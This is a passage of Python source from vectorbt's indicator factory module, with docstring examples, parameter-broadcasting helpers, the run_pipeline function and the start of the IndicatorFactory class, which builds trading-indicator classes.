``` Each of these methods and properties are created for sheer convenience: to easily combine boolean arrays using logical rules and to compare numeric arrays. All operations are done strictly using NumPy. Another advantage is utilization of vectorbt's own broadcasting, such that one can combine inputs and outputs with an arbitrary array-like object, given their shapes can broadcast together. We can also do comparison with multiple objects at once by passing them as a tuple/list: ```python-repl >>> myind.price_above([1.5, 2.5]) custom_price_above 1.5 2.5 a b a b 2020-01-01 False True False True 2020-01-02 True True False True 2020-01-03 True True True True 2020-01-04 True True True False 2020-01-05 True False True False ``` ## Indexing `IndicatorFactory` attaches pandas indexing to the indicator class thanks to `vectorbt.base.array_wrapper.ArrayWrapper`. Supported are `iloc`, `loc`, `*param_name*_loc`, `xs`, and `__getitem__`. This makes possible accessing rows and columns by labels, integer positions, and parameters. ```python-repl >>> ma = vbt.MA.run(price, [2, 3]) >>> ma[(2, 'b')] <vectorbt.indicators.basic.MA at 0x7fe4d10ddcc0> >>> ma[(2, 'b')].ma 2020-01-01 NaN 2020-01-02 4.5 2020-01-03 3.5 2020-01-04 2.5 2020-01-05 1.5 Name: (2, b), dtype: float64 >>> ma.window_loc[2].ma a b 2020-01-01 NaN NaN 2020-01-02 1.5 4.5 2020-01-03 2.5 3.5 2020-01-04 3.5 2.5 2020-01-05 4.5 1.5 ``` ## TA-Lib Indicator factory also provides a class method `IndicatorFactory.from_talib` that can be used to wrap any function from TA-Lib. It automatically fills all the neccessary information, such as input, parameter and output names. """ import numpy as np import pandas as pd from numba import njit from numba.typed import List import itertools import inspect from collections import OrderedDict import warnings from vectorbt.utils import checks from vectorbt.utils.decorators import classproperty, cached_property from vectorbt.utils.config import merge_dicts from vectorbt.utils.random import set_seed from vectorbt.utils.params import ( to_typed_list, broadcast_params, create_param_product, DefaultParam ) from vectorbt.utils.enum import convert_str_enum_value from vectorbt.base import index_fns, reshape_fns, combine_fns from vectorbt.base.indexing import ParamIndexerFactory from vectorbt.base.array_wrapper import ArrayWrapper, Wrapping def params_to_list(params, is_tuple, is_array_like): """Cast parameters to a list.""" check_against = [list, List] if not is_tuple: check_against.append(tuple) if not is_array_like: check_against.append(np.ndarray) check_against = tuple(check_against) if isinstance(params, check_against): new_params = list(params) else: new_params = [params] return new_params def prepare_params(param_list, param_settings, input_shape=None, to_2d=False): """Prepare parameters.""" new_param_list = [] for i, params in enumerate(param_list): _param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i] is_tuple = _param_settings.get('is_tuple', False) dtype = _param_settings.get('dtype', None) if checks.is_namedtuple(dtype): params = convert_str_enum_value(dtype, params) is_array_like = _param_settings.get('is_array_like', False) bc_to_input = _param_settings.get('bc_to_input', False) broadcast_kwargs = _param_settings.get('broadcast_kwargs', dict(require_kwargs=dict(requirements='W'))) new_params = params_to_list(params, is_tuple, is_array_like) if bc_to_input is not False: # Broadcast to input or its axis if is_tuple: raise ValueError("Tuples cannot be broadcast to input") if input_shape is None: raise ValueError("Cannot broadcast to input if input shape is unknown. Pass input_shape.") if bc_to_input is True: to_shape = input_shape else: checks.assert_in(bc_to_input, (0, 1)) # Note that input_shape can be 1D if bc_to_input == 0: to_shape = input_shape[0] else: to_shape = input_shape[1] if len(input_shape) > 1 else (1,) _new_params = reshape_fns.broadcast( *new_params, to_shape=to_shape, **broadcast_kwargs ) if len(new_params) == 1: _new_params = (_new_params,) if to_2d and bc_to_input is True: # If inputs are meant to reshape to 2D, do the same to parameters # But only to those that fully resemble inputs (= not raw) __new_params = list(_new_params) for j, param in enumerate(__new_params): keep_raw = broadcast_kwargs.get('keep_raw', False) if keep_raw is False or (isinstance(keep_raw, (tuple, list)) and not keep_raw[j]): __new_params[j] = reshape_fns.to_2d(param) new_params = __new_params else: new_params = _new_params new_param_list.append(new_params) return new_param_list def build_columns(param_list, input_columns, level_names=None, hide_levels=None, param_settings=None, per_column=False, ignore_default=False, **kwargs): """For each parameter in `param_list`, create a new column level with parameter values and stack it on top of `input_columns`. Returns a list of parameter indexes and new columns.""" if level_names is not None: checks.assert_len_equal(param_list, level_names) if hide_levels is None: hide_levels = [] if param_settings is None: param_settings = {} param_indexes = [] shown_param_indexes = [] for i in range(len(param_list)): params = param_list[i] level_name = None if level_names is not None: level_name = level_names[i] if per_column: param_index = index_fns.index_from_values(params, name=level_name) else: _param_settings = param_settings if isinstance(param_settings, dict) else param_settings[i] _per_column = _param_settings.get('per_column', False) if _per_column: param_index = None for param in params: bc_param = np.broadcast_to(param, len(input_columns)) _param_index = index_fns.index_from_values(bc_param, name=level_name) if param_index is None: param_index = _param_index else: param_index = param_index.append(_param_index) if len(param_index) == 1 and len(input_columns) > 1: # When using flexible column-wise parameters param_index = index_fns.repeat_index( param_index, len(input_columns), ignore_default=ignore_default ) else: param_index = index_fns.index_from_values(param_list[i], name=level_name) param_index = index_fns.repeat_index( param_index, len(input_columns), ignore_default=ignore_default ) param_indexes.append(param_index) if i not in hide_levels: shown_param_indexes.append(param_index) if len(shown_param_indexes) > 0: if not per_column: n_param_values = len(param_list[0]) if len(param_list) > 0 else 1 input_columns = index_fns.tile_index( input_columns, n_param_values, ignore_default=ignore_default ) stacked_columns = index_fns.stack_indexes([*shown_param_indexes, input_columns], **kwargs) return param_indexes, stacked_columns return param_indexes, input_columns def run_pipeline( num_ret_outputs, custom_func, *args, require_input_shape=False, input_shape=None, input_index=None, input_columns=None, input_list=None, in_output_list=None, in_output_settings=None, broadcast_kwargs=None, param_list=None, param_product=False, param_settings=None, speedup=False, silence_warnings=False, per_column=False, pass_col=False, keep_pd=False, to_2d=True, as_lists=False, pass_input_shape=False, pass_flex_2d=False, level_names=None, hide_levels=None, stacking_kwargs=None, return_raw=False, use_raw=None, wrapper_kwargs=None, seed=None, **kwargs): """A pipeline for running an indicator, used by `IndicatorFactory`. Args: num_ret_outputs (int): The number of output arrays returned by `custom_func`. custom_func (callable): A custom calculation function. See `IndicatorFactory.from_custom_func`. *args: Arguments passed to the `custom_func`. require_input_shape (bool): Whether to input shape is required. Will set `pass_input_shape` to True and raise an error if `input_shape` is None. input_shape (tuple): Shape to broadcast each input to. Can be passed to `custom_func`. See `pass_input_shape`. input_index (any): Sets index of each input. Can be used to label index if no inputs passed. input_columns (any): Sets columns of each input. Can be used to label columns if no inputs passed. input_list (list of array_like): A list of input arrays. in_output_list (list of array_like): A list of in-place output arrays. If an array should be generated, pass None. in_output_settings (dict or list of dict): Settings corresponding to each in-place output. Following keys are accepted: * `dtype`: Create this array using this data type and `np.empty`. Default is None. broadcast_kwargs (dict): Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast` to broadcast inputs. param_list (list of array_like): A list of parameters. Each element is either an array-like object or a single value of any type. param_product (bool): Whether to build a Cartesian product out of all parameters. param_settings (dict or list of dict): Settings corresponding to each parameter. Following keys are accepted: * `dtype`: If data type is enumerated type and a string as parameter value was passed, will convert it to integer first. * `is_tuple`: If tuple was passed, it will be considered as a single value. To treat it as multiple values, pack it into a list. * `is_array_like`: If array-like object was passed, it will be considered as a single value. To treat it as multiple values, pack it into a list. * `bc_to_input`: Whether to broadcast parameter to input size. You can also broadcast parameter to an axis by passing an integer. * `broadcast_kwargs`: Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`. * `per_column`: Whether each parameter value can be split per column such that it can be better reflected in a multi-index. Does not affect broadcasting. speedup (bool): Whether to run only on unique parameter combinations. Disable if two identical parameter combinations can lead to different results (e.g., due to randomness) or if inputs are large and `custom_func` is fast. !!! note Cache, raw output, and output objects outside of `num_ret_outputs` will be returned for unique parameter combinations only. silence_warnings (bool): Whether to hide warnings such as coming from `speedup`. per_column (bool): Whether to split the DataFrame into Series, one per column, and run `custom_func` on each Series. Each list of parameter values will be broadcast to the number of columns and each parameter value will be applied per Series rather than per DataFrame. Input shape must be known beforehand. pass_col (bool): Whether to pass column index as keyword argument if `per_column` is set to True. keep_pd (bool): Whether to keep inputs as pandas objects, otherwise convert to NumPy arrays. to_2d (bool): Whether to reshape inputs to 2-dim arrays, otherwise keep as-is. as_lists (bool): Whether to pass inputs and parameters to `custom_func` as lists. If `custom_func` is Numba-compiled, passes tuples. pass_input_shape (bool): Whether to pass `input_shape` to `custom_func` as keyword argument. pass_flex_2d (bool): Whether to pass `flex_2d` to `custom_func` as keyword argument. level_names (list of str): A list of column level names corresponding to each parameter. Should have the same length as `param_list`. hide_levels (list): A list of indices of parameter levels to hide. stacking_kwargs (dict): Keyword arguments passed to `vectorbt.base.index_fns.repeat_index`, `vectorbt.base.index_fns.tile_index`, and `vectorbt.base.index_fns.stack_indexes` when stacking parameter and input column levels. return_raw (bool): Whether to return raw output without post-processing and hashed parameter tuples. use_raw (bool): Takes the raw results and uses them instead of running `custom_func`. wrapper_kwargs (dict): Keyword arguments passed to `vectorbt.base.array_wrapper.ArrayWrapper`. seed (int): Set seed to make output deterministic. **kwargs: Keyword arguments passed to the `custom_func`. Some common arguments include `return_cache` to return cache and `use_cache` to use cache. Those are only applicable to `custom_func` that supports it (`custom_func` created using `IndicatorFactory.from_apply_func` are supported by default). Returns: Array wrapper, list of inputs (`np.ndarray`), input mapper (`np.ndarray`), list of outputs (`np.ndarray`), list of parameter arrays (`np.ndarray`), list of parameter mappers (`np.ndarray`), list of outputs that are outside of `num_ret_outputs`. ## Explanation Here is a subset of tasks that the function `run_pipeline` does: * Takes one or multiple array objects in `input_list` and broadcasts them. ```python-repl >>> sr = pd.Series([1, 2], index=['x', 'y']) >>> df = pd.DataFrame([[3, 4], [5, 6]], index=['x', 'y'], columns=['a', 'b']) >>> input_list = vbt.base.reshape_fns.broadcast(sr, df) >>> input_list[0] a b x 1 1 y 2 2 >>> input_list[1] a b x 3 4 y 5 6 ``` * Takes one or multiple parameters in `param_list`, converts them to NumPy arrays and broadcasts them. ```python-repl >>> p1, p2, p3 = 1, [2, 3, 4], [False] >>> param_list = vbt.base.reshape_fns.broadcast(p1, p2, p3) >>> param_list[0] array([1, 1, 1]) >>> param_list[1] array([2, 3, 4]) >>> param_list[2] array([False, False, False]) ``` * Performs calculation using `custom_func` to build output arrays (`output_list`) and other objects (`other_list`, optionally). ```python-repl >>> def custom_func(ts1, ts2, p1, p2, p3, *args, **kwargs): ... return np.hstack(( ... ts1 + ts2 + p1[0] * p2[0], ... ts1 + ts2 + p1[1] * p2[1], ... ts1 + ts2 + p1[2] * p2[2], ... )) >>> output = custom_func(*input_list, *param_list) >>> output array([[ 6, 7, 7, 8, 8, 9], [ 9, 10, 10, 11, 11, 12]]) ``` * Creates new column hierarchy based on parameters and level names. ```python-repl >>> p1_columns = pd.Index(param_list[0], name='p1') >>> p2_columns = pd.Index(param_list[1], name='p2') >>> p3_columns = pd.Index(param_list[2], name='p3') >>> p_columns = vbt.base.index_fns.stack_indexes([p1_columns, p2_columns, p3_columns]) >>> new_columns = vbt.base.index_fns.combine_indexes([p_columns, input_list[0].columns]) >>> output_df = pd.DataFrame(output, columns=new_columns) >>> output_df p1 1 p2 2 3 4 p3 False False False False False False a b a b a b 0 6 7 7 8 8 9 1 9 10 10 11 11 12 ``` * Broadcasts objects in `input_list` to match the shape of objects in `output_list` through tiling. This is done to be able to compare them and generate signals, since we cannot compare NumPy arrays that have totally different shapes, such as (2, 2) and (2, 6). ```python-repl >>> new_input_list = [ ... input_list[0].vbt.tile(len(param_list[0]), keys=p_columns), ... input_list[1].vbt.tile(len(param_list[0]), keys=p_columns) ... ] >>> new_input_list[0] p1 1 p2 2 3 4 p3 False False False False False False a b a b a b 0 1 1 1 1 1 1 1 2 2 2 2 2 2 ``` * Builds parameter mappers that will link parameters from `param_list` to columns in `input_list` and `output_list`. This is done to enable column indexing using parameter values. """ if require_input_shape: checks.assert_not_none(input_shape) pass_input_shape = True if input_list is None: input_list = [] if in_output_list is None: in_output_list = [] if in_output_settings is None: in_output_settings = {} in_output_settings_keys = ['dtype'] if isinstance(in_output_settings, dict): checks.assert_dict_valid(in_output_settings, [in_output_settings_keys]) else: for _in_output_settings in in_output_settings: checks.assert_dict_valid(_in_output_settings, [in_output_settings_keys]) if broadcast_kwargs is None: broadcast_kwargs = {} if param_list is None: param_list = [] if param_settings is None: param_settings = {} param_settings_keys = [ 'dtype', 'is_tuple', 'is_array_like', 'bc_to_input', 'broadcast_kwargs', 'per_column' ] if isinstance(param_settings, dict): checks.assert_dict_valid(param_settings, [param_settings_keys]) else: for _param_settings in param_settings: checks.assert_dict_valid(_param_settings, [param_settings_keys]) if hide_levels is None: hide_levels = [] if stacking_kwargs is None: stacking_kwargs = {} if wrapper_kwargs is None: wrapper_kwargs = {} if keep_pd and checks.is_numba_func(custom_func): raise ValueError("Cannot pass pandas objects to a Numba-compiled custom_func. Set keep_pd to False.") in_output_idxs = [i for i, x in enumerate(in_output_list) if x is not None] if len(in_output_idxs) > 0: # In-place outputs should broadcast together with inputs input_list += [in_output_list[i] for i in in_output_idxs] if len(input_list) > 0: # Broadcast inputs if input_index is None: input_index = 'default' if input_columns is None: input_columns = 'default' # If input_shape is provided, will broadcast all inputs to this shape broadcast_kwargs = merge_dicts(dict( to_shape=input_shape, index_from=input_index, columns_from=input_columns ), broadcast_kwargs) bc_input_list, input_shape, input_index, input_columns = reshape_fns.broadcast( *input_list, return_meta=True, **broadcast_kwargs ) if len(input_list) == 1: bc_input_list = (bc_input_list,) input_list = list(map(np.asarray, bc_input_list)) bc_in_output_list = [] if len(in_output_idxs) > 0: # Separate inputs and in-place outputs bc_in_output_list = input_list[-len(in_output_idxs):] input_list = input_list[:-len(in_output_idxs)] # Reshape input shape if input_shape is not None and not isinstance(input_shape, tuple): input_shape = (input_shape,) # Keep original input_shape for per_column=True orig_input_shape = input_shape orig_input_shape_2d = input_shape if input_shape is not None: orig_input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1) if per_column: # input_shape is now the size of one column if input_shape is None: raise ValueError("input_shape is required when per_column=True") input_shape = (input_shape[0],) input_shape_ready = input_shape input_shape_2d = input_shape if input_shape is not None: input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1) if to_2d: if input_shape is not None: input_shape_ready = input_shape_2d # ready for custom_func # Prepare parameters # NOTE: input_shape instead of input_shape_ready since parameters should # broadcast by the same rules as inputs param_list = prepare_params(param_list, param_settings, input_shape=input_shape, to_2d=to_2d) if len(param_list) > 1: # Check level names checks.assert_type(level_names, (list, tuple)) checks.assert_len_equal(param_list, level_names) # Columns should be free of the specified level names if input_columns is not None: for level_name in level_names: if level_name is not None: checks.assert_level_not_exists(input_columns, level_name) if param_product: # Make Cartesian product out of all params param_list = create_param_product(param_list) if len(param_list) > 0: # Broadcast such that each array has the same length if per_column: # The number of parameters should match the number of columns before split param_list = broadcast_params(param_list, to_n=orig_input_shape_2d[1]) else: param_list = broadcast_params(param_list) n_param_values = len(param_list[0]) if len(param_list) > 0 else 1 use_speedup = False param_list_unique = param_list if not per_column and speedup: try: # Try to get all unique parameter combinations param_tuples = list(zip(*param_list)) unique_param_tuples = list(OrderedDict.fromkeys(param_tuples).keys()) if len(unique_param_tuples) < len(param_tuples): param_list_unique = list(map(list, zip(*unique_param_tuples))) use_speedup = True except: pass if checks.is_numba_func(custom_func): # Numba can't stand untyped lists param_list_ready = [to_typed_list(params) for params in param_list_unique] else: param_list_ready = param_list_unique n_unique_param_values = len(param_list_unique[0]) if len(param_list_unique) > 0 else 1 # Prepare inputs if per_column: # Split each input into Series/1-dim arrays, one per column input_list_ready = [] for input in input_list: input_2d = reshape_fns.to_2d(input) col_inputs = [] for i in range(input_2d.shape[1]): if to_2d: col_input = input_2d[:, [i]] else: col_input = input_2d[:, i] if keep_pd: # Keep as pandas object col_input = ArrayWrapper(input_index, input_columns[[i]], col_input.ndim).wrap(col_input) col_inputs.append(col_input) input_list_ready.append(col_inputs) else: input_list_ready = [] for input in input_list: new_input = input if to_2d: new_input = reshape_fns.to_2d(input) if keep_pd: # Keep as pandas object new_input = ArrayWrapper(input_index, input_columns, new_input.ndim).wrap(new_input) input_list_ready.append(new_input) # Prepare in-place outputs in_output_list_ready = [] j = 0 for i in range(len(in_output_list)): if input_shape_2d is None: raise ValueError("input_shape is required when using in-place outputs") if i in in_output_idxs: # This in-place output has been already broadcast with inputs in_output_wide = np.require(bc_in_output_list[j], requirements='W') if not per_column: # One per parameter combination in_output_wide = reshape_fns.tile(in_output_wide, n_unique_param_values, axis=1) j += 1 else: # This in-place output hasn't been provided, so create empty _in_output_settings = in_output_settings if isinstance(in_output_settings, dict) else in_output_settings[i] dtype = _in_output_settings.get('dtype', None) in_output_shape = (input_shape_2d[0], input_shape_2d[1] * n_unique_param_values) in_output_wide = np.empty(in_output_shape, dtype=dtype) in_output_list[i] = in_output_wide in_outputs = [] # Split each in-place output into chunks, each of input shape, and append to a list for i in range(n_unique_param_values): in_output = in_output_wide[:, i * input_shape_2d[1]: (i + 1) * input_shape_2d[1]] if len(input_shape_ready) == 1: in_output = in_output[:, 0] if keep_pd: if per_column: in_output = ArrayWrapper(input_index, input_columns[[i]], in_output.ndim).wrap(in_output) else: in_output = ArrayWrapper(input_index, input_columns, in_output.ndim).wrap(in_output) in_outputs.append(in_output) in_output_list_ready.append(in_outputs) if checks.is_numba_func(custom_func): # Numba can't stand untyped lists in_output_list_ready = [to_typed_list(in_outputs) for in_outputs in in_output_list_ready] def _use_raw(_raw): # Use raw results of previous run to build outputs _output_list, _param_map, _n_input_cols, _other_list = _raw idxs = np.array([_param_map.index(param_tuple) for param_tuple in zip(*param_list)]) _output_list = [ np.hstack([o[:, idx * _n_input_cols:(idx + 1) * _n_input_cols] for idx in idxs]) for o in _output_list ] return _output_list, _param_map, _n_input_cols, _other_list # Get raw results if use_raw is not None: # Use raw results of previous run to build outputs output_list, param_map, n_input_cols, other_list = _use_raw(use_raw) else: # Prepare other arguments func_args = args func_kwargs = {} if pass_input_shape: func_kwargs['input_shape'] = input_shape_ready if pass_flex_2d: if input_shape is None: raise ValueError("Cannot determine flex_2d without inputs") func_kwargs['flex_2d'] = len(input_shape) == 2 func_kwargs = merge_dicts(func_kwargs, kwargs) # Set seed if seed is not None: set_seed(seed) def _call_custom_func(_input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs): # Run the function if as_lists: if checks.is_numba_func(custom_func): return custom_func( tuple(_input_list_ready), tuple(_in_output_list_ready), tuple(_param_list_ready), *_func_args, **_func_kwargs ) return custom_func( _input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs ) return custom_func( *_input_list_ready, *_in_output_list_ready, *_param_list_ready, *_func_args, **_func_kwargs ) if per_column: output = [] for col in range(orig_input_shape_2d[1]): # Select the column of each input and in-place output, and the respective parameter combination _input_list_ready = [] for _inputs in input_list_ready: # Each input array is now one column wide _input_list_ready.append(_inputs[col]) _in_output_list_ready = [] for _in_outputs in in_output_list_ready: # Each in-output array is now one column wide if isinstance(_in_outputs, List): __in_outputs = List() else: __in_outputs = [] __in_outputs.append(_in_outputs[col]) _in_output_list_ready.append(__in_outputs) _param_list_ready = [] for _params in param_list_ready: # Each parameter list is now one element long if isinstance(_params, List): __params = List() else: __params = [] __params.append(_params[col]) _param_list_ready.append(__params) _func_args = func_args _func_kwargs = func_kwargs.copy() if 'use_cache' in func_kwargs: use_cache = func_kwargs['use_cache'] if isinstance(use_cache, list) and len(use_cache) == orig_input_shape_2d[1]: # Pass cache for this column _func_kwargs['use_cache'] = func_kwargs['use_cache'][col] if pass_col: _func_kwargs['col'] = col col_output = _call_custom_func( _input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs ) output.append(col_output) else: output = _call_custom_func( input_list_ready, in_output_list_ready, param_list_ready, *func_args, **func_kwargs ) # Return cache if kwargs.get('return_cache', False): if use_speedup and not silence_warnings: warnings.warn("Cache is produced by unique parameter " "combinations when speedup=True", stacklevel=2) return output def _split_output(output): # Post-process results if output is None: _output_list = [] _other_list = [] else: if isinstance(output, (tuple, list, List)): _output_list = list(output) else: _output_list = [output] # Other outputs should be returned without post-processing (for example cache_dict) if len(_output_list) > num_ret_outputs: _other_list = _output_list[num_ret_outputs:] if use_speedup and not silence_warnings: warnings.warn("Additional output objects are produced by unique parameter " "combinations when speedup=True", stacklevel=2) else: _other_list = [] # Process only the num_ret_outputs outputs _output_list = _output_list[:num_ret_outputs] if len(_output_list) != num_ret_outputs: raise ValueError("Number of returned outputs other than expected") _output_list = list(map(lambda x: reshape_fns.to_2d(x, raw=True), _output_list)) return _output_list, _other_list if per_column: output_list = [] other_list = [] for _output in output: __output_list, __other_list = _split_output(_output) output_list.append(__output_list) if len(__other_list) > 0: other_list.append(__other_list) # Concatenate each output (must be one column wide) output_list = [np.hstack(input_group) for input_group in zip(*output_list)] else: output_list, other_list = _split_output(output) # In-place outputs are treated as outputs from here output_list = in_output_list + output_list # Prepare raw param_map = list(zip(*param_list_unique)) # account for use_speedup output_shape = output_list[0].shape for output in output_list: if output.shape != output_shape: raise ValueError("All outputs must have the same shape") if per_column: n_input_cols = 1 else: n_input_cols = output_shape[1] // n_unique_param_values if input_shape_2d is not None: if n_input_cols != input_shape_2d[1]: if per_column: raise ValueError("All outputs must have one column when per_column=True") else: raise ValueError("All outputs must have the number of columns = #input columns x #parameters") raw = output_list, param_map, n_input_cols, other_list if return_raw: if use_speedup and not silence_warnings: warnings.warn("Raw output is produced by unique parameter " "combinations when speedup=True", stacklevel=2) return raw if use_speedup: output_list, param_map, n_input_cols, other_list = _use_raw(raw) # Update shape and other meta if no inputs if input_shape is None: if n_input_cols == 1: input_shape = (output_list[0].shape[0],) else: input_shape = (output_list[0].shape[0], n_input_cols) else: input_shape = orig_input_shape if input_index is None: input_index = pd.RangeIndex(start=0, step=1, stop=input_shape[0]) if input_columns is None: input_columns = pd.RangeIndex(start=0, step=1, stop=input_shape[1] if len(input_shape) > 1 else 1) # Build column hierarchy and create mappers if len(param_list) > 0: # Build new column levels on top of input levels param_indexes, new_columns = build_columns( param_list, input_columns, level_names=level_names, hide_levels=hide_levels, param_settings=param_settings, per_column=per_column, **stacking_kwargs ) # Build a mapper that maps old columns in inputs to new columns # Instead of tiling all inputs to the shape of outputs and wasting memory, # we just keep a mapper and perform the tiling when needed input_mapper = None if len(input_list) > 0: if per_column: input_mapper = np.arange(len(input_columns)) else: input_mapper = np.tile(np.arange(len(input_columns)), n_param_values) # Build mappers to easily map between parameters and columns mapper_list = [param_indexes[i] for i in range(len(param_list))] else: # Some indicators don't have any params new_columns = input_columns input_mapper = None mapper_list = [] # Return artifacts: no pandas objects, just a wrapper and NumPy arrays new_ndim = len(input_shape) if output_list[0].shape[1] == 1 else output_list[0].ndim wrapper = ArrayWrapper(input_index, new_columns, new_ndim, **wrapper_kwargs) return wrapper, \ input_list, \ input_mapper, \ output_list[:len(in_output_list)], \ output_list[len(in_output_list):], \ param_list, \ mapper_list, \ other_list def perform_init_checks(wrapper, input_list, input_mapper, in_output_list, output_list, param_list, mapper_list, short_name, level_names): """Perform checks on objects created by running or slicing an indicator.""" if input_mapper is not None: checks.assert_equal(input_mapper.shape[0], wrapper.shape_2d[1]) for ts in input_list: checks.assert_equal(ts.shape[0], wrapper.shape_2d[0]) for ts in in_output_list + output_list: checks.assert_equal(ts.shape, wrapper.shape_2d) for params in param_list: checks.assert_len_equal(param_list[0], params) for mapper in mapper_list: checks.assert_equal(len(mapper), wrapper.shape_2d[1]) checks.assert_type(short_name, str) checks.assert_len_equal(level_names, param_list) def combine_objs(obj, other, *args, level_name=None, keys=None, **kwargs): """Combines/compares `obj` to `other`, for example, to generate signals. Both will be broadcast together. Pass `other` as a tuple or a list to compare with multiple arguments. In this case, a new column level will be created with the name `level_name`. See `vectorbt.base.accessors.BaseAccessor.combine`.""" if isinstance(other, (tuple, list)): if keys is None: keys = index_fns.index_from_values(other, name=level_name) return obj.vbt.combine(other, *args, keys=keys, concat=True, **kwargs) def f(*args): return type(*args) class IndicatorFactory: def __init__(self, class_name='Indicator', class_docstring='', module_name=__name__, short_name=None, prepend_name=True, input_names=None, param_names=None, in_output_names=None, output_names=None, output_flags=None, custom_output_props=None, attr_settings=None): """A factory for creating new indicators. Initialize `IndicatorFactory` to create a skeleton and then use a class method such as `IndicatorFactory.from_custom_func` to bind a calculation function to the skeleton. Args: class_name (str): Name for the created indicator class. class_docstring (str): Docstring for the created indicator class. module_name (str): Specify the module the class originates from. short_name (str): A short name of the indicator. Defaults to lower-case `class_name`. prepend_name (bool): Whether to prepend `short_name` to each parameter level. input_names (list of str): A list of names of input arrays. param_names (list of str): A list of names of parameters. in_output_names (list of str): A list of names of in-place output arrays. An in-place output is an output that is not returned but modified in-place. Some advantages of such outputs include: 1) they don't need to be returned, 2) they can be passed between functions as easily as inputs, 3) they can be provided with already allocated data to safe memory, 4) if data or default value are not provided, they are created empty to not occupy memory. output_names (list of str): A list of names of output arrays. output_flags (dict): A dictionary of in-place and regular output flags. custom_output_props (dict): A dictionary with user-defined functions that will be bound to the indicator class and (if not a property) wrapped with `@cached_property`. attr_settings (dict): A dictionary of settings by attribute name. Attributes can be `input_names`, `in_output_names`, `output_names` and `custom_output_props`. Following keys are accepted: * `dtype`: Data type used to determine which methods to generate around this attribute. Set to None to disable. Default is `np.float_`. Can be set to instance of `collections.namedtuple` acting as enumerated type; it will then create a property with suffix `readable` that contains data in a string format. !!! note The `__init__` method is not used for running the indicator, for this use `run`. The reason for this is indexing, which requires a clean `__init__` method for creating a new indicator object with newly indexed attributes. """ # Check and save parameters self.class_name = class_name checks.assert_type(class_name, str) self.class_docstring = class_docstring checks.assert_type(class_docstring, str) self.module_name = module_name if module_name is not None: checks.assert_type(module_name, str) if short_name is None: if class_name == 'Indicator': short_name = 'custom' else: short_name = class_name.lower() self.short_name = short_name checks.assert_type(short_name, str) self.prepend_name = prepend_name checks.assert_type(prepend_name, bool) if input_names is None: input_names = [] checks.assert_type(input_names, (tuple, list)) self.input_names = input_names if param_names is None: param_names = [] checks.assert_type(param_names, (tuple, list)) self.param_names = param_names if in_output_names is None: in_output_names = [] checks.assert_type(in_output_names, (tuple, list)) self.in_output_names = in_output_names if output_names is None: output_names = [] checks.assert_type(output_names, (tuple, list)) self.output_names = output_names all_output_names = in_output_names + output_names if len(all_output_names) == 0: raise ValueError("Must have at least one in-place or regular output") if output_flags is None: output_flags = {} checks.assert_type(output_flags, dict) if len(output_flags) > 0: checks.assert_dict_valid(output_flags, [all_output_names]) self.output_flags = output_flags if custom_output_props is None: custom_output_props = {} checks.assert_type(custom_output_props, dict) self.custom_output_props = custom_output_props if attr_settings is None: attr_settings = {} checks.assert_type(attr_settings, dict) all_attr_names = input_names + all_output_names + list(custom_output_props.keys()) if len(attr_settings) > 0: checks.assert_dict_valid(attr_settings, [all_attr_names]) self.attr_settings = attr_settings # Set up class ParamIndexer = ParamIndexerFactory( param_names + (['tuple'] if len(param_names) > 1 else []), module_name=module_name ) Indicator = type(self.class_name, (Wrapping, ParamIndexer), {}) Indicator.__doc__ = self.class_docstring if module_name is not None: Indicator.__module__ = self.module_name # Add indexing methods def _indexing_func(obj, pd_indexing_func, **kwargs): new_wrapper, idx_idxs, _, col_idxs = obj.wrapper._indexing_func_meta(pd_indexing_func, **kwargs) idx_idxs_arr = reshape_fns.to_1d(idx_idxs, raw=True) col_idxs_arr = reshape_fns.to_1d(col_idxs, raw=True) if np.array_equal(idx_idxs_arr, np.arange(obj.wrapper.shape_2d[0])): idx_idxs_arr = slice(None, None, None) if np.array_equal(col_idxs_arr, np.arange(obj.wrapper.shape_2d[1])): col_idxs_arr = slice(None, None, None) input_mapper = getattr(obj, '_input_mapper', None) if input_mapper is not None: input_mapper = input_mapper[col_idxs_arr] input_list = [] for input_name in input_names: input_list.append(getattr(obj, f'_{input_name}')[idx_idxs_arr]) in_output_list = [] for in_output_name in in_output_names: in_output_list.append(getattr(obj, f'_{in_output_name}')[idx_idxs_arr, :][:, col_idxs_arr]) output_list = [] for output_name in output_names: output_list.append(getattr(obj, f'_{output_name}')[idx_idxs_arr, :][:, col_idxs_arr]) param_list = [] for param_name in param_names: param_list.append(getattr(obj, f'_{param_name}_array')) mapper_list = [] for param_name in param_names: # Tuple mapper is a list because of its complex data type mapper_list.append(getattr(obj, f'_{param_name}_mapper')[col_idxs_arr]) return obj.copy( wrapper=new_wrapper, input_list=input_list, input_mapper=input_mapper, in_output_list=in_output_list, output_list=output_list, param_list=param_list, mapper_list=mapper_list ) setattr(Indicator, '_indexing_func', _indexing_func) # Create read-only properties prop = property(lambda _self: _self._short_name) prop.__doc__ = "Name of the indicator." setattr(Indicator, 'short_name', prop) prop = property(lambda _self: _self._level_names) prop.__doc__ = "Column level names corresponding to each parameter." setattr(Indicator, 'level_names', prop) prop = classproperty(lambda _self: input_names) prop.__doc__ = "Names of the input arrays." setattr(Indicator, 'input_names', prop) prop = classproperty(lambda _self: param_names) prop.__doc__ = "Names of the parameters." setattr(Indicator, 'param_names', prop) prop = classproperty(lambda _self: in_output_names) prop.__doc__ = "Names of the in-place output arrays." setattr(Indicator, 'in_output_names', prop) prop = classproperty(lambda _self: output_names) prop.__doc__ = "Names of the regular output arrays." setattr(Indicator, 'output_names', prop) prop = classproperty(lambda _self: output_flags) prop.__doc__ = "Dictionary of output flags." setattr(Indicator, 'output_flags', prop) for param_name in param_names: prop = property(lambda _self, param_name=param_name: getattr(_self, f'_{param_name}_array')) prop.__doc__ = f"Array of `{param_name}` combinations." setattr(Indicator, f'{param_name}_array', prop) for input_name in input_names: def input_prop(_self, input_name=input_name): """Input array.""" old_input = reshape_fns.to_2d(getattr(_self, '_' + input_name), raw=True) input_mapper = getattr(_self, '_input_mapper') if input_mapper is None: return _self.wrapper.wrap(old_input) return _self.wrapper.wrap(old_input[:, input_mapper]) input_prop.__name__ = input_name setattr(Indicator, input_name, cached_property(input_prop)) 